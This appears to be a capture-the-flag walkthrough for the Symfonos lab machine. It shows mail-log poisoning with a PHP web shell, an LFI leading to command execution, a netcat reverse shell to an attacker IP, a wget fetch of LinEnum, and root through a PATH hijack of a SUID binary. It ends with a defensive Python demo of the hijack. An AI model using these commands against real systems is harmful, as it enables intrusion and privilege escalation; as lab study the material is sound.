/bin/sh: 1: dhclient: not found

From MAILER-DAEMON  Fri May 15 03:59:12 2020
Return-Path: <>
X-Original-To: helios@symfonos.localdomain
Delivered-To: helios@symfonos.localdomain
Received: by symfonos.localdomain (Postfix)
        id A851B40B7A; Fri, 15 May 2020 03:59:12 -0500 (CDT)
Date: Fri, 15 May 2020 03:59:12 -0500 (CDT)
From: MAILER-DAEMON@symfonos.localdomain (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: helios@symfonos.localdomain
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
        boundary="2EE7C40AB0.1589533152/symfonos.localdomain"
Content-Transfer-Encoding: 8bit
Message-Id: <20200515085912.A851B40B7A@symfonos.localdomain>

This is a MIME-encapsulated message.

--2EE7C40AB0.1589533152/symfonos.localdomain
Content-Description: Notification
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit

This is the mail system at host symfonos.localdomain.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to postmaster.

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

                   The mail system

<helios@blah.com>: Host or domain name not found. Name service error for
    name=blah.com type=MX: Host not found, try again

--2EE7C40AB0.1589533152/symfonos.localdomain
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; symfonos.localdomain
X-Postfix-Queue-ID: 2EE7C40AB0
X-Postfix-Sender: rfc822; helios@symfonos.localdomain
Arrival-Date: Fri, 28 Jun 2019 19:46:02 -0500 (CDT)

Final-Recipient: rfc822; helios@blah.com
Original-Recipient: rfc822;helios@blah.com
Action: failed
Status: 4.4.3
Diagnostic-Code: X-Postfix; Host or domain name not found. Name service error
    for name=blah.com type=MX: Host not found, try again

--2EE7C40AB0.1589533152/symfonos.localdomain
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Return-Path: <helios@symfonos.localdomain>
Received: by symfonos.localdomain (Postfix, from userid 1000)
        id 2EE7C40AB0; Fri, 28 Jun 2019 19:46:02 -0500 (CDT)
To: helios@blah.com
Subject: New WordPress Site
X-PHP-Originating-Script: 1000:class-phpmailer.php
Date: Sat, 29 Jun 2019 00:46:02 +0000
From: WordPress <wordpress@192.168.201.134>
Message-ID: <65c8fc37d21cc0046899dadd559f3bd1@192.168.201.134>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

http://192.168.201.134/h3l105

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during installation.
Log in here: http://192.168.201.134/h3l105/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/

Log Poisoning via Mail

include() parses the included file as PHP, so if we can get PHP code into a file we are able to include, that code executes. helios' mailbox is such a file: anything we mail to helios is appended to /var/mail/helios, and Postfix on port 25 accepts mail for local users without authentication. So we send a PHP one-liner to helios and include the mailbox again.

telnet

Connect to the SMTP port:

telnet 192.168.1.112 25

Then send a message to helios whose body is the PHP code:

MAIL FROM:<choo>

RCPT TO:helios

data

<?php system($_GET['cmd']); ?>

.

After that, go back to the browser and add a cmd parameter, so the query string becomes pl=/var/mail/helios&cmd=id

The output of id appears in the page, which confirms the PHP in the mailbox is executed: we have command execution through the LFI. Note that every later include of /var/mail/helios will run whatever cmd is passed, so this stays in the mailbox until it is cleaned up.

Reverse Shell

Start a listener on our machine:

nc -nlvp 4444

and then, in the URL, set cmd=nc -e /bin/bash 192.168.43.182 4444 (URL-encode the spaces as %20 or + if the browser does not do it for you).

We get a connection! Note that -e only exists in some netcat builds (netcat-traditional on Debian); if it is missing on the target, another reverse shell one-liner is needed.

Then we need to upgrade to a proper TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

LinEnum

LinEnum is available on GitHub (rebootuser/LinEnum). Serve it from our machine with a quick HTTP server:

python -m SimpleHTTPServer

(that is Python 2; on Python 3 the equivalent is python3 -m http.server 8000)

Then on the victim, fetch it with wget 192.168.43.182:8000/LinEnum.sh

After that, chmod +x LinEnum.sh to make it executable and run ./LinEnum.sh

PATH variable exploit

In the SUID section of the LinEnum output, /opt/statuscheck stands out: a custom SUID binary owned by root.

Running it prints what looks like the output of curl. strings on the binary confirms it: it contains the command curl -I http://localhost, and running curl -I http://localhost ourselves gives the same familiar output.

The binary invokes curl by bare name rather than an absolute path, so the shell it spawns resolves curl through PATH, and PATH is inherited from us, the caller. We can therefore put our own curl first in PATH and have the SUID binary run it with root privileges.

First head to /tmp and create the fake curl:

cd /tmp

echo "/bin/sh" > curl

chmod +x curl

Then put /tmp at the front of PATH:

export PATH=/tmp:$PATH

And run /opt/statuscheck

It runs our curl, which is really /bin/sh, and we get a root shell. (If the spawned shell drops its privileges, use /bin/bash -p in the fake curl instead.)

Navigate to /root to get the flag.
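Added example (not from the original post): reproducing the PATH hijack offline, so the mechanism is visible without the box. It mimics what strings showed the binary doing, i.e. hand "curl -I http://localhost" to /bin/sh -c the way system() does, once with an attacker-controlled PATH and once with a fixed trusted PATH. The fake curl only echoes a marker instead of spawning /bin/sh, the trusted PATH value is an assumption, and nothing here is SUID; the point is which file the bare name resolves to.

```python
# Added example: why a bare "curl" in a SUID binary is hijackable through PATH.
import os
import subprocess
import tempfile

STATUSCHECK_CMD = "curl -I http://localhost"   # what strings found in /opt/statuscheck
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"  # assumption: what a hardened binary would force


def plant_fake_curl(directory, body="echo HIJACKED"):
    """Drop an executable named curl into directory; on the box the body would be /bin/sh."""
    path = os.path.join(directory, "curl")
    with open(path, "w") as f:
        f.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, 0o755)
    return path


def sh(cmd, env):
    """Mimic system(): run /bin/sh -c <cmd> under the given environment, return stdout."""
    r = subprocess.run(["/bin/sh", "-c", cmd], env=env,
                       capture_output=True, text=True, timeout=10)
    return r.stdout.strip()


def demo():
    with tempfile.TemporaryDirectory() as d:
        fake = plant_fake_curl(d)
        attacker_env = {"PATH": d + os.pathsep + TRUSTED_PATH}  # export PATH=/tmp:$PATH
        hardened_env = {"PATH": TRUSTED_PATH}                    # PATH fixed by the program
        return {
            # the binary's own command now executes our file
            "hijacked_output": sh(STATUSCHECK_CMD, attacker_env),
            "hijacked_resolves_to_fake": sh("command -v curl", attacker_env) == fake,
            # with a fixed PATH the fake directory is never searched
            "hardened_resolves_to_fake": sh("command -v curl", hardened_env).startswith(d),
        }


if __name__ == "__main__":
    print(demo())
```

The hardened run shows the fix from the binary's side: a SUID program must not trust PATH or anything else inherited from its caller. Call /usr/bin/curl by absolute path, set PATH explicitly before system(), or better, do not make a helper like this SUID at all.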

Congratulations!
